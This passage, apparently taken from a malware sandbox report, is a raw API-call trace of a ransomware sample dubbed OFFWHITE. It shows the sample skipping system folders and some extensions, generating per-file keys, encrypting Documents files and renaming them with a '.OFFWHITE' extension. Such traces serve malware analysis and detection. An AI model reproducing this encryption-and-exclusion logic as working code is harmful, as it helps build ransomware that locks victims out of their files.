HALPmcxz\\Documents\\" [0133.351] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="hXl6FO224kZ4lZ dB.xls" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls" [0133.351] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.351] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.351] PathFindExtensionW (pszPath="hXl6FO224kZ4lZ dB.xls") returned=".xls" [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".com") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".cpl") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".url") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".mp3") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".pif") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".mp4") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".OFFWHITE") returned 1 [0133.351] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0133.351] lstrcmpiW (lpString1="hXl6FO224kZ4lZ dB.xls", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.351] GetProcessHeap () returned 0x500000 [0133.351] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f778 [0133.351] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hxl6fo224kz4lz db.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.353] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=54921) returned 1 [0133.353] GetProcessHeap () returned 0x500000 [0133.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.353] GetProcessHeap () returned 0x500000 [0133.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.353] GetProcessHeap () returned 0x500000 [0133.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.353] GetProcessHeap () returned 0x500000 [0133.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.353] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.353] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.353] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.354] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.354] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.354] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.354] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd689, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.354] SetLastError (dwErrCode=0x0) [0133.354] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.356] GetLastError () returned 0x0 [0133.357] GetLastError () returned 0x0 [0133.357] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd789, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.357] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.357] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xd889, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.357] WriteFile (in: hFile=0xb0, lpBuffer=0x53f778*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f778*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.357] GetProcessHeap () returned 0x500000 [0133.357] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xd689) returned 0x55a7b8 [0133.357] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.357] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xd689, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xd689, lpOverlapped=0x0) returned 1 [0133.362] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.362] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xd689, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xd689, lpOverlapped=0x0) returned 1 [0133.363] GetProcessHeap () returned 0x500000 [0133.363] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.363] CloseHandle (hObject=0xb0) returned 1 [0133.364] GetProcessHeap () returned 0x500000 [0133.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.365] GetProcessHeap () returned 0x500000 [0133.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.365] GetProcessHeap () returned 0x500000 [0133.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.365] GetProcessHeap () returned 0x500000 [0133.365] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.365] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls" [0133.365] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls.OFFWHITE" [0133.365] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hxl6fo224kz4lz db.xls"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hXl6FO224kZ4lZ dB.xls.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hxl6fo224kz4lz db.xls.offwhite")) returned 1 [0133.366] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71dddcb0, ftCreationTime.dwHighDateTime=0x1d5e4d5, ftLastAccessTime.dwLowDateTime=0x2e548740, ftLastAccessTime.dwHighDateTime=0x1d5a7d2, ftLastWriteTime.dwLowDateTime=0x2e548740, ftLastWriteTime.dwHighDateTime=0x1d5a7d2, nFileSizeHigh=0x0, nFileSizeLow=0x2e78, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="ioA3l84DWMmZk70a4Z.docx", cAlternateFileName="IOA3L8~1.DOC")) returned 1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2=".") returned 1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="..") returned 1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="...") returned 1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="windows") returned -1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="$recycle.bin") returned 1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="rsa") returned -1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="ntuser.dat") returned -1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="programdata") returned -1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="appdata") returned 1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="program files") returned -1 [0133.366] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="program files (x86)") returned -1 [0133.366] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.367] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="ioA3l84DWMmZk70a4Z.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx" [0133.367] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.367] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.367] PathFindExtensionW (pszPath="ioA3l84DWMmZk70a4Z.docx") returned=".docx" [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0133.367] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0133.367] lstrcmpiW (lpString1="ioA3l84DWMmZk70a4Z.docx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.367] GetProcessHeap () returned 0x500000 [0133.367] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f788 [0133.367] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ioa3l84dwmmzk70a4z.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.370] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=11896) returned 1 [0133.370] GetProcessHeap () returned 0x500000 [0133.370] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.371] GetProcessHeap () returned 0x500000 [0133.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.371] GetProcessHeap () returned 0x500000 [0133.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.371] GetProcessHeap () returned 0x500000 [0133.371] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.371] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.371] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.371] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.371] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.371] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.371] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.371] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.371] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.371] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.371] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.371] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.371] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.372] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2e78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.372] SetLastError (dwErrCode=0x0) [0133.372] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.376] GetLastError () returned 0x0 [0133.376] GetLastError () returned 0x0 [0133.376] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2f78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.376] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.376] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3078, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.377] WriteFile (in: hFile=0xb0, lpBuffer=0x53f788*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f788*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0133.377] GetProcessHeap () returned 0x500000 [0133.377] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2e78) returned 0x55a7b8 [0133.377] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.377] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x2e78, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x2e78, lpOverlapped=0x0) returned 1 [0133.378] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.378] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x2e78, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x2e78, lpOverlapped=0x0) returned 1 [0133.379] GetProcessHeap () returned 0x500000 [0133.379] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0133.379] CloseHandle (hObject=0xb0) returned 1 [0133.380] GetProcessHeap () returned 0x500000 [0133.381] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0133.381] GetProcessHeap () returned 0x500000 [0133.381] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0133.381] GetProcessHeap () returned 0x500000 [0133.381] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0133.381] GetProcessHeap () returned 0x500000 [0133.381] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0133.381] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx" [0133.381] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx.OFFWHITE" [0133.381] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ioa3l84dwmmzk70a4z.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ioA3l84DWMmZk70a4Z.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ioa3l84dwmmzk70a4z.docx.offwhite")) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b414590, ftCreationTime.dwHighDateTime=0x1d5e48d, ftLastAccessTime.dwLowDateTime=0x5aeb6850, ftLastAccessTime.dwHighDateTime=0x1d5e1f2, ftLastWriteTime.dwLowDateTime=0x5aeb6850, ftLastWriteTime.dwHighDateTime=0x1d5e1f2, nFileSizeHigh=0x0, nFileSizeLow=0x11feb, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="jK7JOPKq1fVD16ZSuE70.xlsx", cAlternateFileName="JK7JOP~1.XLS")) returned 1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2=".") returned 1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="..") returned 1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="...") returned 1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="windows") returned -1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="$recycle.bin") returned 1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="rsa") returned -1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="ntuser.dat") returned -1 [0133.384] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="programdata") returned -1 [0133.385] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="appdata") returned 1 [0133.385] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="program files") returned -1 [0133.385] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="program files (x86)") returned -1 [0133.385] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0133.385] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="jK7JOPKq1fVD16ZSuE70.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx" [0133.385] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.385] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.385] PathFindExtensionW (pszPath="jK7JOPKq1fVD16ZSuE70.xlsx") returned=".xlsx" [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0133.385] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0133.386] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0133.386] lstrcmpiW (lpString1="jK7JOPKq1fVD16ZSuE70.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0133.386] GetProcessHeap () returned 0x500000 [0133.386] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f798 [0133.386] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jK7JOPKq1fVD16ZSuE70.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jk7jopkq1fvd16zsue70.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0133.387] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=73707) returned 1 [0133.387] GetProcessHeap () returned 0x500000 [0133.387] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0133.387] GetProcessHeap () returned 0x500000 [0133.387] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0133.387] GetProcessHeap () returned 0x500000 [0133.387] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0133.388] GetProcessHeap () returned 0x500000 [0133.388] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0133.388] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.388] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.388] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0133.388] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.388] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.388] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0133.388] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.388] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.388] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0133.388] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0133.389] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0133.389] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0133.389] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x11feb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.389] SetLastError (dwErrCode=0x0) [0133.389] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0133.391] GetLastError () returned 0x0 [0133.391] GetLastError () returned 0x0 [0133.391] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x120eb, 